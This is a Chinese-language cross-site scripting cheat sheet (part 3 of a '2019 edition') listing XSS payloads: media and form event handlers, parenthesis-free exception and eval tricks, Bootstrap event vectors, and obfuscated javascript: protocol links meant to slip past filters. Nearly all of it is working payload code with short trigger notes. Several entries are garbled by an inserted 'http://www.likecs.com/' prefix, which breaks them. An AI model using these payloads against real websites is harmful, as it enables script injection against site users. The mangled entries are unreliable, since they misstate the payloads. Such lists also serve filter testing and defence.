跨站脚本（XSS）备忘单-2019版 (3)

需要点击元素才能暂停（Chrome、Firefox、IE、Safari)

<audio autoplay controls onpause=alert(1)><source src="http://www.likecs.com/validaudio.wav" type="audio/wav"></audio>

需要点击（Chrome、Firefox、IE、Safari)

<form onreset=alert(1)><input type=reset>

提交表单并且输入具有搜索的type属性时触发（Chrome）

<form><input type=search onsearch=alert(1) value=http://www.likecs.com/"Hit return" autofocus>

需要点击元素时间轴（Chrome、Firefox、IE、Safari)

<audio autoplay controls onseeked=alert(1)><source src="http://www.likecs.com/validaudio.wav" type="audio/wav"></audio>

需要点击元素时间轴（Chrome、Firefox、IE、Safari)

<audio autoplay controls onseeking=alert(1)><source src="http://www.likecs.com/validaudio.wav" type="audio/wav"></audio>

需要选择文字（Chrome、Firefox、IE、Safari)

<input onselect=alert(1) value=http://www.likecs.com/"XSS" autofocus>

需要提交表单（Chrome、Firefox、IE、Safari)

<form onsubmit=alert(1)><input type=submit>

需要在页面上的任意位置单击并重新加载（Chrome)

<svg onunload=window.open('javascript:alert(1)')>

需要调节音量（Chrome、Firefox、IE、Safari)

<audio autoplay controls onvolumechange=alert(1)><source src="http://www.likecs.com/validaudio.wav" type="audio/wav"></audio>

使用鼠标滚轮时触发（Chrome、Firefox、IE、Safari)

<body onwheel=alert(1)> 限制字符

无括号，使用异常处理

<script>onerror=alert;throw 1</script>

无括号，无分号，使用异常处理

<script>{onerror=alert}throw 1</script>

无括号的异常处理，没有使用表达式的半冒号

<script>throw onerror=alert,1</script>

无括号异常处理和evil

<script>throw onerror=eval,'=alert\x281\x29'</script>

无括号，在Firefox上使用异常处理和evil

<script>{onerror=eval}throw{lineNumber:1,columnNumber:1,fileName:1,message:'alert\x281\x29'}</script>

无括号，使用ES6 hasInstance和instanceof与eval

<script>'alert\x281\x29'instanceof{[Symbol.hasInstance]:eval}</script>

无括号，使用ES6的hasInstance和instanceof以及eval

<script>'alert\x281\x29'instanceof{[Symbol['hasInstance']]:eval}</script>

无括号，使用位置重定向

<script>location='javascript:alert\x281\x29'</script>

无字符串，使用位置没有括号重定向

<script>location=name</script>

无括号，使用模板字符串

<script>alert`1`</script> 前端框架

Bootstrap onanimationstart事件

<xss onanimationstart=alert(1)>

Bootstrap ontransitionend事件

<xss data-ride=carousel data-interval=http://www.likecs.com/100 ontransitionend=alert(1)><xss><xss></xss><xss></xss></xss></xss> 通讯协议

iframe src属性JavaScript协议

<iframe src=http://www.likecs.com/"javascript:alert(1)">

具有JavaScript协议的对象data属性

<object data=http://www.likecs.com/"javascript:alert(1)">

使用JavaScript协议嵌入src属性

<embed src=http://www.likecs.com/"javascript:alert(1)">

标准的JavaScript协议

<a href="javascript:alert(1)">XSS</a>

不区分大小写的协议

<a href="http://www.likecs.com/JaVaScript:alert(1)">XSS</a>

协议之前允许使用字符\x01- \x20

<a href=" javascript:alert(1)">XSS</a>

协议中允许使用字符\ x09，\x0a，\x0d

<a href="javas cript:alert(1)">XSS</a>

协议名称后在冒号前允许字符\x09，\x0a，\x0d

<a href="javas cript:alert(1)">XSS</a>

带有JavaScript协议的SVG中的Xlink命名空间

<svg><a xlink:href="javascript:alert(1)"><text x="20" y="20">XSS</text></a>